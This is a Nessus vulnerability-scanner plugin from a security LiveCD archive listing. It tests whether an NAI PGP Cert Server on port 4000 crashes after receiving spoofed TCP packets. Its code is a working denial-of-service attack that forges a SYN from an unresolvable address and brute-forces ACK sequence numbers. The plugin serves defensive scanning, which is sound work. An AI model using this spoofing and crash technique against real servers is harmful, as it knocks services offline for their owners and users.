home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / PGPCert_DoS.nasl < prev    next >
Text File  |  2005-03-31  |  4KB  |  147 lines
  1. #
  2. # This script was written by John Lampe (j_lampe@bellsouth.net)
  3. #
  4. # Changes by rd : description
  5. #
  6. # See the Nessus Scripts License for details
  7. #
  8. if(description)
  9. {
  10.   script_id(10442);
  11.   script_bugtraq_id(1343);
  12.  script_version ("$Revision: 1.12 $");
  13.   script_cve_id("CAN-2000-0543");
  14.   script_name(english:"NAI PGP Cert Server DoS");
  15.   script_description(english:"
  16. It was possible to make the remote PGP Cert Server
  17. crash by spoofing a TCP connection that seems to
  18. come from an unresolvable IP address.
  19.  
  20. An attacker may use this flaw to prevent your PGP 
  21. certificate server from working properly.
  22.  
  23. Solution: Upgrade to the latest version.
  24.  
  25. Risk factor : High");
  26.   script_summary(english:"Check for DoS in PGP Cert Server");
  27.   script_category(ACT_DENIAL);
  28.   script_family(english:"Denial of Service", francais:"DΘni de service");
  29.   script_copyright(english:"By John Lampe....j_lampe@bellsouth.net");
  30.   script_require_ports(4000);
  31.   exit(0);
  32. }
  33.  
  34.  
  35.  
  36. #
  37. # The script code starts here
  38.  
  39.  
  40. if(!get_port_state(4000))exit(0);
  41.  
  42. soc = open_sock_tcp(4000);
  43. if(!soc)exit(0);
  44. close(soc);
  45.  
  46.  
  47. #get a sequence number from the target
  48.  
  49.  
  50. dstaddr=get_host_ip();
  51. srcaddr=this_host();
  52. IPH = 20;
  53. IP_LEN = IPH;
  54.  
  55. ip = forge_ip_packet(   ip_v : 4,
  56.                         ip_hl : 5,
  57.                         ip_tos : 0,
  58.                         ip_len : IP_LEN,
  59.                         ip_id : 0xABA,
  60.                         ip_p : IPPROTO_TCP,
  61.                         ip_ttl : 255,
  62.                         ip_off : 0,
  63.                         ip_src : srcaddr);
  64.  
  65. port = get_host_open_port();
  66. if(!port)port = 139;
  67.  
  68. tcpip = forge_tcp_packet(    ip       : ip,
  69.                              th_sport : port,
  70.                              th_dport : port,
  71.                              th_flags : TH_SYN,
  72.                              th_seq   : 0xF1C,
  73.                              th_ack   : 0,
  74.                              th_x2    : 0,
  75.                              th_off   : 5,
  76.                              th_win   : 512,
  77.                              th_urp   : 0);
  78.  
  79. filter = string("tcp and (src addr ", dstaddr, " and dst addr ", srcaddr, " dst port ", port, ")");
  80. result = send_packet(tcpip, pcap_active:TRUE, pcap_filter:filter);
  81. if (result)  {
  82.   tcp_seq = get_tcp_element(tcp:result, element:"th_seq");
  83. }
  84.  
  85.  
  86.  
  87.  
  88. #now spoof Funky IP with guessed sequence numbers
  89.  
  90.  
  91. #packet 1.....SPOOF SYN
  92. IPH = 20;
  93. IP_LEN = IPH;
  94. newsrcaddr = 10.187.76.12;
  95. port = 4000;
  96.  
  97. ip2 = forge_ip_packet(   ip_v : 4,
  98.                         ip_hl : 5,
  99.                         ip_tos : 0,
  100.                         ip_len : IP_LEN,
  101.                         ip_id : 0xABA,
  102.                         ip_p : IPPROTO_TCP,
  103.                         ip_ttl : 255,
  104.                         ip_off : 0,
  105.                         ip_src : newsrcaddr);
  106.  
  107.  
  108. tcpip = forge_tcp_packet(    ip       : ip2,
  109.                              th_sport : 5555,
  110.                              th_dport : port,
  111.                              th_flags : TH_SYN,
  112.                              th_seq   : 0xF1C,
  113.                              th_ack   : 0,
  114.                              th_x2    : 0,
  115.                              th_off   : 5,
  116.                              th_win   : 512,
  117.                              th_urp   : 0);
  118.  
  119. result = send_packet(tcpip,pcap_active:FALSE);
  120.  
  121.  
  122. # SPOOF SYN/ACK (brute guess next sequence number)
  123.  
  124.  
  125. for (j=tcp_seq+1; j < tcp_seq + 25; j=j+1) {
  126.   tcpip = forge_tcp_packet(    ip       : ip2,
  127.                                th_sport : 5555,
  128.                                th_dport : port,
  129.                                th_flags : TH_ACK,
  130.                                th_seq   : 0xF1D,
  131.                                th_ack   : j,
  132.                                th_x2    : 0,
  133.                                th_off   : 5,
  134.                                th_win   : 512,
  135.                                th_urp   : 0);
  136.  
  137.  
  138.   send_packet(tcpip,pcap_active:FALSE);
  139. }
  140.  
  141. sleep(15);
  142. soc = open_sock_tcp(4000);
  143. if(!soc)
  144. {
  145.  security_hole(4000);
  146. }
  147.